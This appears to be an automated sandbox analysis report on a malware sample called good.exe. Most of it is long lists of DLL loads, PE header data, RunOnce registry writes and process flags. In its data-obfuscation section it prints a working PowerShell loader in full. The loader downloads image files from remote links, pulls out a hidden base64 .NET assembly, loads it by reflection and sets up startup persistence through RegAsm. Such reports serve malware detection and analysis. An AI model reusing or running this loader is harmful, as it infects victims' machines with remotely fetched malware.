Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: good.exeStatic PE information: Image base 0x140000000 > 0x60000000
                    Source: good.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: good.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: good.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: good.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: good.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: good.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: good.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: good.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: wextract.pdb source: good.exe
                    Source: Binary string: wextract.pdbGCTL source: good.exe
                    Source: Binary string: wkernel32.pdb source: fontdrvhost.exe, 0000000C.00000003.2007870873.0000000005240000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2007716394.0000000005120000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdb source: fontdrvhost.exe, 0000000C.00000003.2008104480.0000000005120000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2008517695.0000000005340000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb source: fontdrvhost.exe, 0000000C.00000003.2005726658.0000000005310000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2005425038.0000000005120000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: fontdrvhost.exe, 0000000C.00000003.2006376240.0000000005120000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2007391915.00000000052C0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdbUGP source: fontdrvhost.exe, 0000000C.00000003.2005726658.0000000005310000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2005425038.0000000005120000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: fontdrvhost.exe, 0000000C.00000003.2006376240.0000000005120000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2007391915.00000000052C0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdbUGP source: fontdrvhost.exe, 0000000C.00000003.2008104480.0000000005120000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2008517695.0000000005340000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdbUGP source: fontdrvhost.exe, 0000000C.00000003.2007870873.0000000005240000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2007716394.0000000005120000.00000004.00000001.00020000.00000000.sdmp
                    Source: good.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: good.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: good.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: good.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: good.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                    Data Obfuscation

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $dosigo = '…'
                    Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '…'"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.chAFAmk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                    Source: good.exe Static PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                    Source: C:\Users\user\Desktop\good.exe Code function: 0_2_00007FF7319130EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7319130EC
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe Code function: 12_3_02B058BC pushad ; ret 12_3_02B058C1
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe Code function: 12_3_02B0588E push eax; iretd 12_3_02B0589D
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe Code function: 12_3_02B028ED push ebx; ret 12_3_02B028E4
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe Code function: 12_3_02B018C0 push ebp; retf 12_3_02B018C1
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe Code function: 12_3_02B06012 push 00000038h; iretd 12_3_02B0601D
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe Code function: 12_3_02B05606 pushad ; retf 12_3_02B05619
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe Code function: 12_3_02B0225D push eax; ret 12_3_02B0225F
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe Code function: 12_3_02B0278B push ebx; ret 12_3_02B028E4
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe Code function: 12_3_02B00FEA push eax; ret 12_3_02B00FF5
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe Code function: 12_3_02B05FEE push FFFFFFD2h; retf 12_3_02B06011
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe Code function: 12_3_02B04920 push 0000002Eh; iretd 12_3_02B04922
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe Code function: 12_3_02B05F0C push es; iretd 12_3_02B05F0D
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe Code function: 12_3_02B01179 push FFFFFF82h; iretd 12_3_02B0117B
                    Source: C:\Users\user\Desktop\good.exe Code function: 0_2_00007FF731911684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF731911684
                    Source: C:\Users\user\Desktop\good.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
                    Source: C:\Users\user\Desktop\good.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
                    Source: C:\Users\user\Desktop\good.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
                    Source: C:\Users\user\Desktop\good.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
